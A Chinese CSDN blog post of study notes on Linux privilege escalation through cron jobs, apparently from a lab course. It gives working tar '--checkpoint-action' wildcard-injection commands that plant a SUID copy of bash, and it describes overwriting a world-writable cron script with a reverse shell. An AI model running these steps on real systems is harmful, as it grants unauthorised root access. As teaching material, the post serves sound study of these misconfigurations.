Linux提权--定时任务--打包配合 SUID(本地)&文件权限配置不当(WEB+本地)

已于 2024-05-12 16:45:08 修改
阅读量763 收藏 14
点赞数 21
分类专栏: # 权限提升 文章标签: linux 服务器 运维 笔记 网络安全 安全 web安全
于 2024-05-12 16:44:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/138759201
版权

免责声明:本文仅做技术交流与学习...

目录

定时任务 打包配合 SUID-本地

原理:

背景:

操作演示:

分析:

实战发现:

定时任务 文件权限配置不当-WEB&本地

操作演示:

定时任务 打包配合 SUID-本地

原理:

提权通过获取计划任务执行文件信息进行提权 .

1、相对路径和绝对路径执行

2、计划任务命令存在参数调用

利用计划任务的备份功能 tar 命令的参数利用 .

(大部分为本地提权)

背景:

定时任务-->
背景:
运维为了防止数据丢失等,写个定时任务进行数据的打包压缩.
由于数据打包压缩tar命令.
tar可以尝试加参数调用其他命令执行
cd /tmp;tar czf /tmp/backup.tar.gz*
来到tmp目录压缩成backup.tar.gz(当前所有)

--(网站和数据库经常进行备份,tar压缩---隔段时间进行打包.)

操作演示:

#tar--checkpoint=1调用其他命令执行
echo "" > --checkpoint=1  
echo "" > "--checkpoint-action=exec=sh test.sh"  
echo 'cp /bin/bash /tmp/bash;chmod +s /tmp/bash' > test.sh  
chmod +x test.sh 
#创建好文件之后把定时任务开起来.

---文件弄好之后,把定时任务开起来--->

--等待定时任务的运行(打包)

-->得到压缩文件和一个bash文件(test.sh没有运行.)

./bash 命令怎么执行呢??? 多加个 -p 参数.

./bash -p

分析:

实战发现:

查看定时任务有没有可利用(tar打包压缩).

定时任务 文件权限配置不当-WEB&本地

--就是权限配置不当,其他的低权限可以调用,执行等等.

利用不安全的权限分配操作导致的定时文件覆盖

chmod 777 775 等 所有者 组 其他成员说明

操作演示:

--定时任务里添加

vim /etc/crontab

111.sh < ps(或反弹命令)

./111/sh  发现没权限执行 ---chmod +x后才可以.(因为需要权限啊,)

所以:

如果root用户给文件 777 的权限,那么其他用户和组都能动他了.

改完之后,(写个反弹命令)

--当文件被计划任务调用的时候就上线了.

金灰
关注
  • 21
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 11
    评论
专栏目录
Linux提权——环境变量配合SUID&计划任务&第三方数据库
m0_61506558的博客
01-27 711
原始的ps命令,由于环境变量加了tmp,执行ps,即执行/tmp/ps,同时ps是通过bash复制过来的,./shell用SUID执行bash直接进行了提取。
提权Linux 定时任务&环境变量&数据库
qi_SJQ_的博客
02-04 2831
Linux提权环境变量安全-(aliyun,本地): 前提:需要配合SUID进行环境变量提权且是本地用户环境下进行(因此比较难实现) 提权过程:手写调用文件-编译-复制文件-增加环境变量-执行触发。 //demo.c文件 #include<unistd.h> void main(){ setuid(0); setgid(0); system("ps"); } gcc demo.c -o shell //手写一个c语言文件,并上传编译为shell文件 cp /bin/sh ...
Linux权限提升—定时任务、环境变量、权限配置不当、数据库等提权
剁椒鱼头没剁椒的博客
04-05 2275
在上篇文章中提到了Linux权限提升之前的信息收集操作,这里就不在赘述,在前言中讲上篇文章为提到的内容进行补充,至于其它内容可参考上篇文章。Linux权限提升—内核、SUID、脏牛等提权这里将一下在这个提权中需要注意的事项,总体来说有种莫名的鸡肋感觉。如果备份的文件夹你没有写入权限就GG。如果备份的命令是绝对路径也GG。如果管理员设置了其它权限也GG。如果是WEB权限也GG。可能有些文章中是在定时任务中直接写入压缩命令,来完成压缩的,下面我们就来具体分析一下这两条命令。
Linux提权定时任务 && 环境变量 && 配置不当 && 数据库
qq_61553520的博客
06-01 928
比如chmod +x xxx.sh chmod 555 xxx.sh 这些都是正常的,但是有些管理员可能会由于粗心直接设置chmod 777 xxx.sh 此时普通用户也具有w权限,即具有写入权限,拿到普通用户权限之后可以直接修改xxx.sh,比如在脚本中添加反弹shell命令,从而利用定时任务执行反弹shell(执行为root权限)。使用单端口映射可以使多个不同的协议流量通过同一个端口进行传输。结合HTTP隧道和单端口映射,可以实现将其他协议的数据通过HTTP隧道传输,并映射到单个端口上的目标服务器上。
第104天:权限提升-Linux系统&环境变量&定时任务&权限配置不当&MDUT自动化
qq_46081990的博客
06-22 411
知识点总结 #知识点: 1、Linux提权-定时任务 2、Linux提权-环境变量 3、Linux提权-权限配置不当 4、Linux提权-数据库自动化 #系列内容: 内核,数据库,第三方服务,SUID&GUID,定时任务,环境变量,SUDO,权限不当等 脏牛漏洞(CVE-2016-5195) Dirty Pipe(CVE-2022-0847) SUDO(CVE-2021-3156) Polkit(CVE-2021-4034) #截至目前思路点总结如下: 1.提权方法有部分适用在不同环境,当然也有
【权限提升】Linux系统&环境变量&定时任务&权限配置不当&MDUT自动化
今天是几号的博客
03-03 787
Linux-环境变量文件配合SUID-本地 Linux-定时任务打包配合SUID-本地 Linux-定时任务文件权限配置不当-WEB&本地 Linux-第三方软件MYSQL数据库提权-WEB&本地 利用phpmailer漏洞进行修改并反弹 1、无法外联走隧道-MDUT自动化数据库提权 2、利用Mysql提权 searchsploit-手工提权
第103天:权限提升-Linux系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID
qq_46081990的博客
06-22 229
【代码】第103天:权限提升-Linux系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID。
内网渗透-权限提升
qq_63980959的博客
04-05 1030
提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得该服务器权限提权,顾名思义就是提高自己在服务器中的权限 ,比如在windows中本身登录的用户时guest,然后通过提权后就变成超级管理员(adminstrator),拥有了管理windwos的所有权限在Windwos中,权限大概分为四种,分别是Users、Administrator、System、TrustedInstaller。
Linux提权--准备工作&知识点&工具
金灰的博客
04-28 866
1.提权方法有部分适用在不同环境,当然也有通用方法2.提权方法也有操作系统版本区分,特性决定方法利用面3.提权方法有部分需要特定环境,如数据库,第三方提权等。
第64天:权限提升-Linux定时任务&环境变量&数据库1
08-03
1.提权环境,信息收集(SUID,定时任务,可能漏洞,第三方服务应用等) 2.最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本) 3.本地 se
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1
08-03
#案例 3-Linux 提权本地配合内核漏洞演示-Mozhe提权过程:连接-获取可利用漏洞-下载或上传 EXP-编译 EXP-给权限执行-GG#案例 4-Lin
Linux使用suid vim.basic文件实现提权
09-14
主要介绍了Linux使用suid vim.basic文件实现提权,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Linux基础课件-- 特殊权限设置-SUID权限.pptx
11-02
Linux操作系统基础
【PwnKit】CVE-2021-4034-Linux提权脚本
01-27
Qualys研究团队在polkit的pkexec中发现了内存损坏漏洞,pkexec是一个SUID根程序,默认安装在每个主要Linux发行版上。这个易于利用的漏洞允许任何非特权用户通过在默认配置中利用该漏洞来获得脆弱主机上的完全的root...
linux---进程通信
最新发布
m0_74979625的博客
05-17 696
提示:以下是本篇文章正文内容,下面案例可供参考。
Linux 三十六章
一怀明月的博客
05-17 1252
信号量 sem_init sem_destroy sem_wait sem_post 基于环形队列的CP问题 环形队列的生产者消费者模型 线程池 localtime时间戳转化 mkdir系统调用 bind绑定成员函数 懒汉饿汉单例模式 懒汉模式: 饿汉模式: 懒汉和饿汉相同点: 线程池源码实现
jumpserver中添加linux和windows
qq_48736646的博客
05-16 263
前提准备;安装好jumpserver,安装好ldap,使用ldap对接到jumpserver中,并且开启mfa认证。可以参考:https://blog.csdn.net/qq_48736646/article/details/138950532对于建立连接。linux和windows都差不多windows-现在要做的:部署一个远程的windows,普通用户通过jumpserver跳转到个人账户的windows上。
Linux 内核开发 25 - 中的 cpuidle subsystem 介绍
jxusthusiwen的专栏
05-16 588
总的来说, cpuidle 子系统是 Linux 内核中实现 CPU 电源管理的重要组件,通过动态检测 CPU 的使用状态,选择合适的低功耗状态,并提供统一的管理接口,从而提高系统的能源效率。2. 选择低功耗状态:cpuidle 子系统会根据当前 CPU 的状态和系统的需求,选择最合适的低功耗状态,例如 C1、C2、C3 等。3. 进入低功耗状态:cpuidle 子系统会调用特定的 CPU 指令将 CPU 切换到选择的低功耗状态,需要先保存 CPU 的上下文。
Linux系统本地提权
05-19
Linux系统中本地提权是通过利用系统漏洞或者错误配置来提升当前用户的权限,从而获得更高的权限。以下是一些常见的本地提权方法: 1. 提权脚本:一些安全研究人员编写了一些自动化脚本,可以快速识别和利用系统漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值